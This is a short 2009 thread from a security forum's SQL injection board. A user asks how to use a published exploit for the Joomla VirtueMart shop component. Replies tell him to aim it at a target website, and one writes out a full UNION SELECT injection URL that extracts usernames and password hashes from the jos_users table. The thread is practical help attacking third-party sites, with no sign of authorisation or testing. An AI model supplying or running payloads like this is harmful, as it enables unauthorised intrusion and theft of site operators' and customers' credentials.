|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
How can i use this exploit? |
|
Posted: Sun Dec 20, 2009 7:54 pm |
|
|
aritmos |
Advanced user |
|
|
Joined: Jul 21, 2008 |
Posts: 82 |
Location: Inside a salted MD5 |
|
|
|
|
|
|
|
|
|
|
Posted: Sun Dec 20, 2009 8:59 pm |
|
|
lenny |
Valuable expert |
|
|
Joined: May 15, 2008 |
Posts: 275 |
|
|
|
|
|
|
|
Copy and paste the "live demo" into your browser address bar, replacing site.com with the address of your target website.
If that works... and you still need more information, keep us posted on how it goes. |
|
|
|
|
Posted: Sun Dec 20, 2009 10:13 pm |
|
|
aritmos |
Advanced user |
|
|
Joined: Jul 21, 2008 |
Posts: 82 |
Location: Inside a salted MD5 |
|
|
|
|
|
|
If you do this you obtain this:
Error: Sorry, but the Product you've requested wasn't found!
Then i change the product id and item id for a valid id of the web but...what is it in live demo?
3a,id)Gabriel,26,27,2
What is grabiel? In example sql injection it isn´t.... |
|
|
|
|
Posted: Mon Dec 21, 2009 9:53 am |
|
|
aritmos |
Advanced user |
|
|
Joined: Jul 21, 2008 |
Posts: 82 |
Location: Inside a salted MD5 |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Posted: Mon Dec 21, 2009 10:23 am |
|
|
astra |
Beginner |
|
|
Joined: Dec 18, 2009 |
Posts: 4 |
Location: Germany |
|
|
|
|
|
|
so.
Example
yourshop.de
than you take this from the live demo
index.php?page=shop.product_details&flypage=shop.flypage&product_id=6995+union+select+1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,concat(username,0x3a,password,0x3a,gid,0x3a,id)Gabriel,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55+from+jos_users+limit+1,1--&category_id=10&manufacturer_id=11&option=com_virtuemart&Itemid=1&vmcchk=1&Itemid=1
and set it behind your url
yourshop.de/index.php?page=shop.product_details&flypage=shop.flypage&product_id=6995+union+select+1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,concat(username,0x3a,password,0x3a,gid,0x3a,id)Gabriel,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55+from+jos_users+limit+1,1--&category_id=10&manufacturer_id=11&option=com_virtuemart&Itemid=1&vmcchk=1&Itemid=1
and now you have the username and password |
|
|
|
|
|
|
|
|
Posted: Mon Dec 21, 2009 10:31 am |
|
|
aritmos |
Advanced user |
|
|
Joined: Jul 21, 2008 |
Posts: 82 |
Location: Inside a salted MD5 |
|
|
|
|
|
|
Are you kidding me? read complete posttttt. It isn´t run! |
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|